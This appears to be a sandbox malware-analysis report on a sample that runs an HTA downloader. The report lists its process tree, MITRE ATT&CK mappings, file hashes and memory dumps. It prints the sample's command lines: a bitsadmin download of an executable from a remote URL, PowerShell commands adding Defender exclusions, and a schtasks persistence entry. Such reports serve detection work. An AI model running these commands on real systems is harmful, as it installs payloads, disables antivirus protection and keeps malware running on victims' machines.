- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:3824
- - C:\Windows\SysWOW64\bitsadmin.exe
    "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
    3⤵
    - Download via BitsAdmin
    PID:3032
- - C:\Users\Admin\AppData\Local\Temp\XClient.exe
    "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3744

C:\Users\Admin\AppData\Local\Temp\Stand.exe
C:\Users\Admin\AppData\Local\Temp\Stand.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4248

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1484

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
1⤵
PID:1900

C:\Users\Admin\AppData\Local\Temp\Stand.exe
C:\Users\Admin\AppData\Local\Temp\Stand.exe
1⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4340
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Stand.exe'
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4868
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.exe'
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4708
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Stand.exe'
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2284
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.exe'
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4876
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Stand" /tr "C:\Users\Admin\AppData\Local\Temp\Stand.exe"
  2⤵
  - Creates scheduled task(s)
  PID:5056

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

BITS Jobs

T1197

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

BITS Jobs

T1197

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Standlaunchpad.exe.log

Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
f9181f64418cae3d8eb73498c74ea2c2

SHA1
b034df207dcd05550132de526b89fc7f45e77f3a

SHA256
969ebc05f9daffc5ea9c54fa23cfa46ba967cfa4370364e8f47ed988aa0846a0

SHA512
ce0ecccdb4bed314f67e7271d1e4c86d0e4db89f3aa37755de355fecc596fc1d7c0a86e0a053dbce2db834cf5f4c382c503ed64880cb8c1ed5155ed70637865c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6535d8b11529e8708945dc5715092318

SHA1
4e1d7c35fccb8de67d94d635ce4a9f779f3d3e91

SHA256
a063ca7a1d74b318f335ad647247d0d343f79ad1ce16a03a67c17ada3f12ae3a

SHA512
88a6a888ff6bdbe113ceb8e37ee7d19ef23e862c781df2ad5fed8e73d9d90e36fb3ef47f6106cea1461992e5bbb48c4b736f74f94621136d76eebc3d4c2b8607

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
a20dca06287a6581e67dd4b5e7b43f9d

SHA1
dcc0ab13a86cbb0946514046852af1de97ca6f35

SHA256
f0deaf7586f3c98a95089a4bddbbaf8cb6850590774449145ae028f13b262258

SHA512
448bf3b18bb8bfbb7f1039cc70088089d72a9db1d61d252c76d4ea6802e12c487f404ab21e7634f40f3ea58be8beaa650de7ffd45ad9eee7e7093050936f28fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9b80cd7a712469a4c45fec564313d9eb

SHA1
6125c01bc10d204ca36ad1110afe714678655f2d

SHA256
5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d

SHA512
ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
a7cc007980e419d553568a106210549a

SHA1
c03099706b75071f36c3962fcc60a22f197711e0

SHA256
a5735921fc72189c8bf577f3911486cf031708dc8d6bc764fe3e593c0a053165

SHA512
b9aaf29403c467daef80a1ae87478afc33b78f4e1ca16189557011bb83cf9b3e29a0f85c69fa209c45201fb28baca47d31756eee07b79c6312c506e8370f7666

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9072d3c4faa83ef0f5ed5b299b75618d

SHA1
f2bb8ee12abae6da1406fc566810ce397f1d054b

SHA256
9f9196488c5ae1227d43941675252f2399ef20aebba80ed6a829822104c40475

SHA512
a7bb981438e7d0932291531f49c00ca2b57a5c44cedede2b81f5a6abeefb4f00434e0c2edb2d3ad33c21e61e88091042f9d783f9fd39b18cfd1306b450f1f6bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
eb1ad317bd25b55b2bbdce8a28a74a94

SHA1
98a3978be4d10d62e7411946474579ee5bdc5ea6

SHA256
9e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98

SHA512
d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
843fa6530abc38e9c291323ae671462f

SHA1
11fb3d6c1a4fe750bef3c2f582a69139164e857c

SHA256
93f9557a33f4137038f4d99642e96181d8289bfd3c8427a1639567fb53396f29

SHA512
f452d6f6b0692386079e645838e0f0dc2da90885f98787229c7d3dc2fb2f438130cc3409bdbec8c1882b675e08e6618998dfff169c49b556f47f0247a259361d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yuifffui.3r5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Downloader.hta

Filesize
895B

MD5
053491717083a49c85cad7584f55ba79

SHA1
a7645a49952788db42bf667afa10e37123bd1317

SHA256
3902c3a03d0e50e5100d5e2b81d3775e2e43433293ba174cca523f6009e35b79

SHA512
936f02b49df1caf11ad7ebe26f28701b45cbcbd6de7d0a151ef65d090295cdc91270845220582dcae089ca26fdc1e5dfe4f90f626dc36643d7f2bc556ca8cb89

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stand.lnk

Filesize
1KB

MD5
f47a5e4bd90177ede190755ed10a969b

SHA1
a5bcbe1a09705aaeb39d0b32a0ec05cdea378134

SHA256
fc1a8bb13be7e73c6bddf48c4098b915cdc54bd721750aa809d006fad1c7ae3f

SHA512
e0f96533a0c07168969fa658bb422553fd24666921bb82284d933f1524dd03a80d3b52a53762be9db2a70d2f1a25344f48851aa80dc417722e158932cf26b986

Download Submit
C:\Users\Admin\AppData\Roaming\Standlaunchpad.exe

Filesize
96KB

MD5
bf7ee4fc77d1bd202db4d8f3012b1b25

SHA1
2e82842aaec5d9e6e93ce335260ab5bba65be5be

SHA256
1881352351ae38d8f746418425758711c3204b182cc53634d5e55de6a05bfa0d

SHA512
7265349a5363b1c38d919195c13320d4e68b687189223b7e705e7d32630959b22834f8462dd586aef9536f84a8d2a4b6a46d8a43bc0a59688615b06387902eb8

Download Submit
memory/1216-142-0x00000000054F0000-0x0000000005A94000-memory.dmp

Filesize
5.6MB

Download
memory/1216-140-0x0000000004E00000-0x0000000004E92000-memory.dmp

Filesize
584KB

Download
memory/1216-138-0x00000000005A0000-0x00000000005B0000-memory.dmp

Filesize
64KB

Download
memory/1216-139-0x0000000074580000-0x0000000074D30000-memory.dmp

Filesize
7.7MB

Download
memory/1216-143-0x00000000050F0000-0x0000000005156000-memory.dmp

Filesize
408KB

Download
memory/1216-141-0x0000000004EA0000-0x0000000004F3C000-memory.dmp

Filesize
624KB

Download
memory/1352-24-0x000002A57B930000-0x000002A57B940000-memory.dmp

Filesize
64KB

Download
memory/1352-21-0x000002A57C360000-0x000002A57C382000-memory.dmp

Filesize
136KB

Download
memory/1352-22-0x00007FFA64480000-0x00007FFA64F41000-memory.dmp

Filesize
10.8MB

Download
memory/1352-23-0x000002A57B930000-0x000002A57B940000-memory.dmp

Filesize
64KB

Download
memory/1352-36-0x00007FFA64480000-0x00007FFA64F41000-memory.dmp

Filesize
10.8MB

Download
memory/1696-2-0x00007FFA64480000-0x00007FFA64F41000-memory.dmp

Filesize
10.8MB

Download
memory/1696-0-0x0000000000F40000-0x0000000000F66000-memory.dmp

Filesize
152KB

Download
memory/1696-18-0x00007FFA64480000-0x00007FFA64F41000-memory.dmp

Filesize
10.8MB

Download
memory/3528-146-0x0000000074580000-0x0000000074D30000-memory.dmp

Filesize
7.7MB

Download
memory/3528-161-0x00000000064A0000-0x00000000067F4000-memory.dmp

Filesize
3.3MB

Download
memory/3528-150-0x00000000058D0000-0x00000000058F2000-memory.dmp

Filesize
136KB

Download
memory/3528-149-0x0000000005440000-0x0000000005450000-memory.dmp

Filesize
64KB

Download
memory/3528-167-0x0000000074580000-0x0000000074D30000-memory.dmp

Filesize
7.7MB

Download
memory/3528-148-0x0000000005440000-0x0000000005450000-memory.dmp

Filesize
64KB

Download
memory/3528-147-0x0000000005A80000-0x00000000060A8000-memory.dmp

Filesize
6.2MB

Download
memory/3528-164-0x0000000006940000-0x000000000698C000-memory.dmp

Filesize
304KB

Download
memory/3528-144-0x00000000032B0000-0x00000000032E6000-memory.dmp

Filesize
216KB

Download
memory/3528-151-0x0000000006220000-0x0000000006286000-memory.dmp

Filesize
408KB

Download
memory/3528-163-0x0000000006890000-0x00000000068AE000-memory.dmp

Filesize
120KB

Download
memory/3604-145-0x000000001B530000-0x000000001B540000-memory.dmp

Filesize
64KB

Download
memory/3604-57-0x00007FFA64480000-0x00007FFA64F41000-memory.dmp

Filesize
10.8MB

Download
memory/3604-103-0x000000001C890000-0x000000001C89E000-memory.dmp

Filesize
56KB

Download
memory/3604-137-0x000000001E390000-0x000000001E3A6000-memory.dmp

Filesize
88KB

Download
memory/3604-90-0x000000001B530000-0x000000001B540000-memory.dmp

Filesize
64KB

Download
memory/3604-119-0x000000001B530000-0x000000001B540000-memory.dmp

Filesize
64KB

Download
memory/3604-20-0x000000001B530000-0x000000001B540000-memory.dmp

Filesize
64KB

Download
memory/3604-16-0x00007FFA64480000-0x00007FFA64F41000-memory.dmp

Filesize
10.8MB

Download
memory/3604-15-0x0000000000800000-0x000000000081E000-memory.dmp

Filesize
120KB

Download
memory/3744-99-0x00007FFA64480000-0x00007FFA64F41000-memory.dmp

Filesize
10.8MB

Download
memory/3744-102-0x0000027F7EE80000-0x0000027F7EE90000-memory.dmp

Filesize
64KB

Download
memory/3744-91-0x0000027F7E480000-0x0000027F7E496000-memory.dmp

Filesize
88KB

Download
memory/3744-92-0x00007FFA64480000-0x00007FFA64F41000-memory.dmp

Filesize
10.8MB

Download
memory/3744-93-0x0000027F7EE80000-0x0000027F7EE90000-memory.dmp

Filesize
64KB

Download
memory/3744-96-0x0000027F7EE80000-0x0000027F7EE90000-memory.dmp

Filesize
64KB

Download
memory/3744-100-0x0000027F7EE80000-0x0000027F7EE90000-memory.dmp

Filesize
64KB

Download
memory/3744-101-0x0000027F7EE80000-0x0000027F7EE90000-memory.dmp

Filesize
64KB

Download
memory/4248-106-0x00007FFA64480000-0x00007FFA64F41000-memory.dmp

Filesize
10.8MB

Download
memory/4248-109-0x00007FFA64480000-0x00007FFA64F41000-memory.dmp

Filesize
10.8MB

Download
memory/4284-133-0x00000280698A0000-0x00000280698B0000-memory.dmp

Filesize
64KB

Download
memory/4284-130-0x00007FFA64480000-0x00007FFA64F41000-memory.dmp

Filesize
10.8MB

Download
memory/4284-131-0x00000280698A0000-0x00000280698B0000-memory.dmp

Filesize
64KB

Download
memory/4284-132-0x00000280698A0000-0x00000280698B0000-memory.dmp

Filesize
64KB

Download
memory/4284-136-0x00007FFA64480000-0x00007FFA64F41000-memory.dmp

Filesize
10.8MB

Download
memory/4284-134-0x00000280698A0000-0x00000280698B0000-memory.dmp

Filesize
64KB

Download
memory/4500-82-0x000001E4A3720000-0x000001E4A3730000-memory.dmp

Filesize
64KB

Download
memory/4500-81-0x00007FFA64480000-0x00007FFA64F41000-memory.dmp

Filesize
10.8MB

Download
memory/4500-83-0x000001E4A3720000-0x000001E4A3730000-memory.dmp

Filesize
64KB

Download
memory/4500-85-0x00007FFA64480000-0x00007FFA64F41000-memory.dmp

Filesize
10.8MB

Download
memory/4832-55-0x00000291686A0000-0x00000291686B0000-memory.dmp

Filesize
64KB

Download
memory/4832-68-0x00000291686A0000-0x00000291686B0000-memory.dmp

Filesize
64KB

Download
memory/4832-56-0x00000291686A0000-0x00000291686B0000-memory.dmp

Filesize
64KB

Download
memory/4832-70-0x00007FFA64480000-0x00007FFA64F41000-memory.dmp

Filesize
10.8MB

Download
memory/4832-54-0x00007FFA64480000-0x00007FFA64F41000-memory.dmp

Filesize
10.8MB

Download
memory/5096-53-0x00007FFA64480000-0x00007FFA64F41000-memory.dmp

Filesize
10.8MB

Download
memory/5096-51-0x000001DA29C30000-0x000001DA29C40000-memory.dmp

Filesize
64KB

Download
memory/5096-40-0x000001DA29C30000-0x000001DA29C40000-memory.dmp

Filesize
64KB

Download
memory/5096-39-0x000001DA29C30000-0x000001DA29C40000-memory.dmp

Filesize
64KB

Download
memory/5096-38-0x00007FFA64480000-0x00007FFA64F41000-memory.dmp

Filesize
10.8MB

Download